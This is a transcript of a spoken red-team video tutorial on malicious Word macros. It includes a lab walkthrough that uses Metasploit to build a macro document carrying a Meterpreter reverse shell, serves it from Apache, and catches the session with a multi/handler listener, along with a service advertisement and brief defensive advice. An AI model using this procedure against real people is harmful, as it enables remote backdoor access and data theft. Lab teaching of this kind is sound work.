Hello everyone, welcome to Bieber Academy Red Team series. In this chapter, we are going to deep into a concept topic like how hacker exploit Microsoft Word macro to infiltrate the systems and getting into the backdoor access and those things. We will cover what malware and macro are, how they work together, and I'll show you a live demonstration of a malicious macro in this section. So before get into the in detail of demonstrations and those things, let's try to understand what is a malware. Okay, because first of all, we need to understand what is mean by malware. A malware, a short form of the malware, is nothing but a malicious code. Okay, so just imagine it will be like a normal program, which is it will be in an exe format, or it depends upon those things. So just imagine what we will do is we will be running any Word document or PDF. What we'll do, well, just in this case, let's imagine you have a Photoshop. So you just, what you will do, when you execute this, you are just installing, there are like a compiled programs, basically the Photoshops which is compiled it is installing on your computer, and then once it is installed, the Photoshop will be launched, then you can do the design aspect. Okay, so the same way the malicious program, so it is also a malicious program. So basically it is also program, but intention is a malicious one. So the maliciously they will be using for this, so that is why we are called it as a payload or malicious software. So basically this software is designed intentionally to harm or exploit a computer systems. So there are like a lot of malwares are there. One is virus, worm, ransomware, spyware, and more. Each malware have its own way of doing and those things. So viruses will be like a Trojan, worm will be multiply, ransomware will de-encrypt all the files, and spyware will just keylog us. So a lot of things will be those. At the end of the day, these threats can steal data, distribute the operating systems, and even hold the system hostages for the ransomware. So this is the complete understanding of the malware over there. Let's try to understand how hackers actually using the macro to use as a malware, and they're trying to get it over there. So to understand here, first of all, we need to understand what is macro. Then only we can easily understand how the hackers actually using the macro as a malicious thing, and they are merging with the word and what is they are doing on it. Okay, first of all, we need to understand a macro. Macro is nothing but it's essential a small program, okay, which is based on the VB script, Visual Basic Script. Okay, so embedded with the document. So basically it will be embedded with the Word document. Word document is MS of Office, because Microsoft is widely used uh, in industry wise, and large companies are there. So I am just taking example of Word. Okay, so it can be integrated with the Word or Excel, which is a spreadsheet. So macros can be do. So it's nothing but the macro is it just automate the process. For example, the reason why they are using a macro is, so certain calculations or certain things you want to do it repeatedly, the repeated actions can be converted as a macro, or just to automate something else in your office or certain things, so you can use a macro to do that without human interventions. So this is basically the macros are helps to simplify the automatic repetitive task like formatting text or inserting image, which will automatically do without human interruptions. Okay, so that is why the reason macros actually there, which is incredibly useful for productivity. They also present a significant security risk. Basically, any technology comes in there, there will be a, like a plus or minus. Okay, so how we are using the technology is up to us. So what they do is hackers has identified that this can be used in a malicious manner. So instead of sending an exe, they can send a word document with a malicious macro code. So when user execute, then it can do whatever we have seen it, the intentions also in there. So this is what they are trying to do it in the one. So let's try to do well, let's try to understand how this is actually works on it. So how the macros can be exploited. So what they do is hacker will first of all pick a Word document. Okay, so he will just take a Word document, whatever the purpose of it, according to the victim or something else. Maybe he use the hacker can use a legitimate one or whatever. So then what he will, the hacker will be doing on it, merging with macro. So this is a malicious macro will be merged. Hacker will be merging with the Word document. So then it will become a malicious document. Okay. And hacker will be sending to the victim and using via email or any other social engineering matter. Hacker will be sending on it. The victim once open this file. So once the open this file, it will can be the intention is maybe the hacker send it as a ransomware or spyware or a backdoor. So it depends upon the hacker intention or what he's trying to do it. But these are the options that so automatically that allows the remote access to sensor. Or probably stealing sensitive data. Maybe hacker wants to steal all the respective directories like document download folders to be it depends upon it to be sent it over there. Or maybe browser cookies caches depends upon the needs, the hackers will be interpreting over there. So or end of the day, as I said, ransomware disrupt the completely systems, corrupt the files, and even crash the systems or whatever. But this is how the hacker using the sending the malicious word macro document to the victim and achieving this one. So let's go and quickly see the demonstration, simple demonstrations. In today's digital world, your business is constantly at risk from evolving cyber threats and complexity of data governance. Whether you are a startup, freelancer, or even a home-based entrepreneur, protecting your data and system is more important than ever. That's why I come in. I offer affordable, tailored freelance cybersecurity service designated to protect your small business, startup, and solo entrepreneur. Whether you are a content creator or a trader or anyone running a small business from home, here are some key services. Red teaming to simulate the real-time cyber attack to identify the vulnerabilities and strengthen your security posture. Expertise your security advisor to guide you in the data governance, compliance, and security standard by using a various cybersecurity framework. Hands-on security awareness training to protect from advanced phishing and social engineering attacks. I provide the tools and knowledge to strengthen your defense whether you need a SIM support to monitor and manage threat in the real time. Digital forensics to recover from an incident, I got you covered. Cybersecurity doesn't need to be complicated or expensive. I offer affordable, practical solution for business just like yourself. For more information, visit thefedric.in or contact me today for free consultation today. Secure your business with me. So this is completely for education purpose only to demonstrate how actually the malicious macros are working on it. So please use this content for education purpose only. I'm not responsible if you are using this content for malicious intent or malicious purpose. So the I made this video is to demonstrate and for educational purpose only. And one more thing is, this is something like a basics one, so it's something like a very outline of how it is actually works on it. For this demonstration, I'm just using a Metasploit framework. So there's something like sometimes it will be works in a real-time world in your testings in a lab environment. Uh, basically, this is something like a very fundamental to demonstrate how actually hackers using the malicious macros to just do it over there. So it's something like this is very fundamental. So let's go and start the MSF console to do demonstrations. So MSF console. So I have launched the MSF console. Now what we need to do is we need to search for word macro. So just search for the word macro. So if you see that we have a identify, there is a exploit multi-format, which is rating was excellent. And if you see that it is targeted for Word on Windows and Mac OS as well. So there are like other things as well, but let's try to stick with the this one. So what I'll do is let me try to use option number is 2. So let me try to use that. Okay, so now if you see that it is already placed over there. So now by default it is in the payload is window metapreter reverse shell. But let me again just one more time, I'll try to set the same payload for a safer side. Let me paste it, the same one. Okay, the payload is actually set up. Now show options. And if you see that this is a template. So basically this is a template is going to use it. In case in your penetration testings, you can replace with your custom templates. And the file name will be generated as a MSF document. And usually the macro files will be in this extension. So this is what the extension is called usually when you see it over there. And the lhost thread is, this is what, this is my Kali mission IP address. To confirm it, let me open the terminal and just show you the IP. And you see that this is my IP address, so it's fine. So already it's flashed over there, and I'm okay with the port number. Let it be the same. And I don't think so much to be there. Now what I'll do is let me run it. So what this will do is basically this will generate the payload. So if you see that the payload is actually generated on this path, so I have to navigate to this folder, cd, and right click paste this one, and just navigate to this folder path. When I do ls, you can see the folder is there. So what I'm going to do is I'll let me copy this file to Apache web server so that I can download this on my lab machine Windows 10. Okay. So to do that, sudo cp msf doc under var www.html. This is where my the Apache web servers files will be stored over there. So I'm just moving this file over there. This is done. Let me clear it. Let me start the service. Sudo service apache to start. Okay, so the service is actually started. Let me confirm it is running. So it is running over there. Let me close it, again clear it. So what I'll do is now I need to start the console. Basically the reversal listener, I have to keep it ready. So to do that, again, let me make it bigger a little bit. MSF console -q. Basically this will quit the banner and this will launch the MSF console. So I'll just keep it side by side so it will be useful for you to reference it over there. So we have just successfully created this file and we have copied over there. Now the step number 2 is we need to create a listener. So yeah, so to do that, use multi handler. Okay, so this is what, and now we need to set the payload. So set payload, let me paste it, same one. No, I think okay, so it was changed it. No worries, because we copy pasted, right? Okay, so now I have to go back and what we payload we took it is yeah, so this is the payload, Windows metapreter. Let me type it, Windows metapreter So same payload what you are used over there, we have to give the same thing, okay, and TCP. So the payload is ready. Now show options, so that we need to see what is spelling. Okay, L host we have to set it. So set L host, in my case, Kali mission IP, so 192.168.91.128. Okay, this is my Kali mission IP address. The IP address for you, it will be differ. Okay, so I'm leaving as a port number for 4 only because I use the same port number. So let me do it over there and let me confirm again, show options and ensure everything is done. Okay, so now let me launch it. So the listener is ready in some time. Yes. So the listener is started and it is ready. So one thing I need to do is I have to quickly go and download this MSF document in the Windows 10 machine and need to launch it and see. Once the Word file is open, this Metaprata connection will open over there. So to do that, I'm just going to my Windows 10 machine and open the Edge browser. So I have downloaded this file. If you see, let me make it a little bit zoom. I hope you guys, let me make it a little bit large icon. Okay. So if you see that the file is actually downloaded. So this is basically a macro enabled file. So let me open this file. So it's just normal Word document. So this is the normal template which we have just. So as I said earlier, you can customize this document in your penetration testing process. So if you see that when I just open this one, nothing will happen. So if you see nothing has actually happened. So the real magic, the real hack has happened is when you are click this edit button, because macros will always have the mechanisms which basically it runs behind of it. When I click enable edit button, the executions will start over there. Otherwise, it is just in the viewing mode only. So when I click it, now it is actually the macro acts executed. Let me go back to the Kali machine, and if you see that, I got the Metaprata connection. So let me see system info. So it's going to give me, sorry, I think the command is sysinfo, my bad. Okay. So if you see that, it is Windows 10, and so just by the Word document, I got a Metaprata connections over there. So this is how the usually the malicious actor in your penetration testings. So the Word document, this is how how the hackers actually the using a Word document, using a PDF documents, they're trying to hack this one. So this is something like a again I say it's an educational purpose. So now you got idea behind of it. So you need to be more wiser on when you are opening the any malicious document. So you need to be more cautious on that part. And the second top of them is you need to have a updated EDR solutions antivirus programs over there. So yeah, so in this case I have disabled the antivirus, so that is why it is worked fine. And I have disabled other features in the Word, so that is why the macros actually executed. Otherwise the current of things over there, it will be like it will be get detected. But this is something like I made it, the reason is for education purpose, how it is actually the system is actually works on it over there. I hope you got a good amount of understanding. So how the hackers are getting a backdoor access or able to hack by just running with the help of macros and ejecting the macro with embedded with the PDF, and they create a malicious document, and this is how they getting over there. So I hope you got the a good amount of understanding on this from this demonstration. Thank you all for joining me today. I hope you found this session informative and valuable. If you enjoyed the video, please feel free to give a like. I love to hear your thoughts, so feel free to share your feedback in the comment below. Your input shapes me the future of this channel. Make sure to subscribe and hit the notification bell so you don't miss out on any upcoming content, or and whenever I post anything else, you will just definitely notified over there. Also, if you think someone else might benefit from this video, don't hesitate to share it with them. If you have any questions or need any clarifications or anything covered today, you can always reach out to me via Discords and other portals, the Telegrams and Instas, and you can follow it. The links are in the descriptions. So feel free to utilize it accordingly. You can follow me, and you can, according to your things over there, you can do it over there. I'm here to help you. A huge thank you to all my subscribers. Your support keep me motivated to create more valuable content for you. Stay safe, stay curious, and I'll see you soon in the next video. Bye for now. Take care.